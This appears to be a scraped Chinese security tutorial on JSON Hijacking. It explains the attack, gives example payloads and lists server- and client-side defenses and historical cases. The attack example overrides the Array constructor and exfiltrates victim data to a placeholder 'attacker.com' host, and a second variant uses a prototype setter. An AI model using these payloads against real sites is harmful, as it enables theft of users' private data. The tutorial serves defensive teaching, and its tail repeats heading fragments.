JSON Hijacking 攻击分析与防御<\/h1>

1. 什么是JSON Hijacking<\/h2>
JSON Hijacking（JSON劫持）是一种针对Web应用程序的安全攻击方式，攻击者利用浏览器同源策略的特性，窃取从服务器返回的JSON格式数据。<\/p>

2. 攻击原理<\/h2>

JSON Hijacking攻击主要利用以下几个技术点：<\/p>

浏览器同源策略的例外<\/strong>：虽然浏览器禁止跨域读取数据，但允许跨域嵌入某些资源（如script标签）<\/p> <\/li>
JSON数组的特殊性<\/strong>：当JSON数据以数组形式返回时，可以被JavaScript解释器直接执行<\/p> <\/li>

JavaScript原型链污染<\/strong>：通过重写Array构造函数或原型方法窃取数据<\/p> <\/li> <\/ol>
3. 攻击场景<\/h2>
典型的JSON Hijacking攻击场景：<\/p>

目标API返回敏感JSON数组数据（如用户个人信息）<\/li>
API未验证请求来源或未对响应做适当处理<\/li>
用户已登录目标网站，攻击者诱导用户访问恶意页面<\/li> <\/ul>
4. 攻击示例<\/h2>
4.1 基本攻击方式<\/h3>
假设存在一个返回用户敏感信息的API：<\/p>
https:\/\/victim.com\/api\/userinfo 返回数据：[{"id":1,"name":"admin","email":"admin@victim.com"}] <\/code><\/pre> 攻击者构造的恶意页面：<\/p> <script<\/span>> <\/span><\/span>\/\/ 重写Array构造函数 <\/span><\/span><\/span><\/span>function<\/span> Array() { <\/span><\/span> \/\/ 当JSON数据被解析时，这里的代码会执行 <\/span><\/span><\/span><\/span> var<\/span> obj<\/span> =<\/span> this<\/span>; <\/span><\/span> \/\/ 通过定时器获取完整数据 <\/span><\/span><\/span><\/span> setTimeout<\/span>(function<\/span>() { <\/span><\/span> \/\/ 将窃取的数据发送到攻击者服务器 <\/span><\/span><\/span><\/span> new<\/span> Image<\/span>().src<\/span> =<\/span> "http:\/\/attacker.com\/steal?data="<\/span> +<\/span> JSON<\/span>.stringify<\/span>(obj<\/span>); <\/span><\/span> }, 100<\/span>); <\/span><\/span>} <\/span><\/span><\/script<\/span>> <\/span><\/span><\/span> <\/span><\/span><script<\/span> src<\/span>=<\/span>"https:\/\/victim.com\/api\/userinfo"<\/span>><\/script<\/span>> <\/span><\/span><\/code><\/pre>4.2 现代浏览器下的变种<\/h3> 由于现代浏览器对原生对象重写做了限制，攻击者可能采用以下方式：<\/p> <script<\/span>> <\/span><\/span>Object.defineProperty<\/span>(Array.prototype<\/span>, "0"<\/span>, { <\/span><\/span> set<\/span>:<\/span> function<\/span>(value<\/span>) { <\/span><\/span> \/\/ 当数组元素被设置时触发 <\/span><\/span><\/span><\/span> alert<\/span>("Stolen: "<\/span> +<\/span> value<\/span>); <\/span><\/span> } <\/span><\/span>}); <\/span><\/span><\/script<\/span>> <\/span><\/span><script<\/span> src<\/span>=<\/span>"https:\/\/victim.com\/api\/userinfo"<\/span>><\/script<\/span>> <\/span><\/span><\/code><\/pre>5. 防御措施<\/h2> 5.1 服务器端防御<\/h3> 禁止JSON数组响应<\/strong>：<\/p> 将响应包装为JSON对象而非数组<\/li> 例如：{"data": [{"id":1,"name":"admin"}]}<\/code> 代替 [{"id":1,"name":"admin"}]<\/code><\/li> <\/ul> <\/li> 添加前缀<\/strong>：<\/p> 在JSON响应前添加无效字符，如while(1);<\/code>或)]}',\n<\/code><\/li> 示例：while(1);[{"id":1,"name":"admin"}]<\/code><\/li> <\/ul> <\/li> 设置Content-Type<\/strong>：<\/p> 确保响应头包含Content-Type: application\/json<\/code><\/li> 避免浏览器将响应当作JavaScript执行<\/li> <\/ul> <\/li> 使用CSRF Token<\/strong>：<\/p> 要求请求中包含有效的CSRF令牌<\/li> <\/ul> <\/li> <\/ol> 5.2 客户端防御<\/h3> 使用POST而非GET请求<\/strong>：<\/p> JSON数据应通过POST请求获取<\/li> <\/ul> <\/li> 验证请求来源<\/strong>：<\/p> 检查Origin<\/code>或Referer<\/code>头部<\/li> <\/ul> <\/li> 设置X-Content-Type-Options<\/strong>：<\/p> 响应头中添加X-Content-Type-Options: nosniff<\/code><\/li> <\/ul> <\/li> <\/ol> 5.3 其他防御措施<\/h3> 启用CORS策略<\/strong>：<\/p> 设置Access-Control-Allow-Origin<\/code>为特定域名而非*<\/code><\/li> 对于敏感数据，考虑使用Access-Control-Allow-Credentials: true<\/code><\/li> <\/ul> <\/li> 使用自定义数据格式<\/strong>：<\/p> 考虑使用非标准格式如MessagePack<\/li> <\/ul> <\/li> 实施SameSite Cookie属性<\/strong>：<\/p> 设置SameSite=Strict<\/code>或SameSite=Lax<\/code><\/li> <\/ul> <\/li> <\/ol> 6. 检测方法<\/h2> 手动测试<\/strong>：<\/p> 检查API是否返回JSON数组<\/li> 尝试通过script标签加载API端点<\/li> <\/ul> <\/li> 自动化工具<\/strong>：<\/p> 使用Burp Suite等工具扫描JSON端点<\/li> 检查响应头和安全相关头部<\/li> <\/ul> <\/li> <\/ol> 7. 实际案例分析<\/h2> 7.1 历史漏洞<\/h3> Gmail漏洞（2006年）<\/strong>：攻击者可以通过JSON Hijacking获取Gmail联系人列表<\/li> Twitter漏洞（2010年）<\/strong>：Twitter API曾受到JSON Hijacking攻击<\/li> <\/ul> 7.2 现代框架的影响<\/h3> 现代前端框架（如React、Angular、Vue）通常使用XMLHttpRequest或Fetch API获取数据，这些API受同源策略限制，天然防御了JSON Hijacking。但开发者仍需注意：<\/p> 避免直接使用<script><\/code>标签加载API<\/li> 确保后端API有适当的安全措施<\/li> <\/ol> 8. 总结<\/h2> JSON Hijacking是一种利用浏览器特性窃取JSON数据的攻击方式，虽然现代浏览器和安全实践已减少其威胁，但仍需开发者注意：<\/p> 永远不要以数组形式返回敏感JSON数据<\/li> 实施适当的服务器端防御措施<\/li> 结合其他安全机制如CSRF防护<\/li> 定期进行安全审计和测试<\/li> <\/ol> 通过理解攻击原理并实施多层防御，可以有效防止JSON Hijacking攻击。<\/p>

JSON Hijacking 攻击分析与防御<\/h1>

1. 什么是JSON Hijacking<\/h2> JSON Hijacking（JSON劫持）是一种针对Web应用程序的安全攻击方式，攻击者利用浏览器同源策略的特性，窃取从服务器返回的JSON格式数据。<\/p>

4. 攻击示例<\/h2>

5. 防御措施<\/h2>

7. 实际案例分析<\/h2>

1. 什么是JSON Hijacking<\/h2>
JSON Hijacking（JSON劫持）是一种针对Web应用程序的安全攻击方式，攻击者利用浏览器同源策略的特性，窃取从服务器返回的JSON格式数据。<\/p>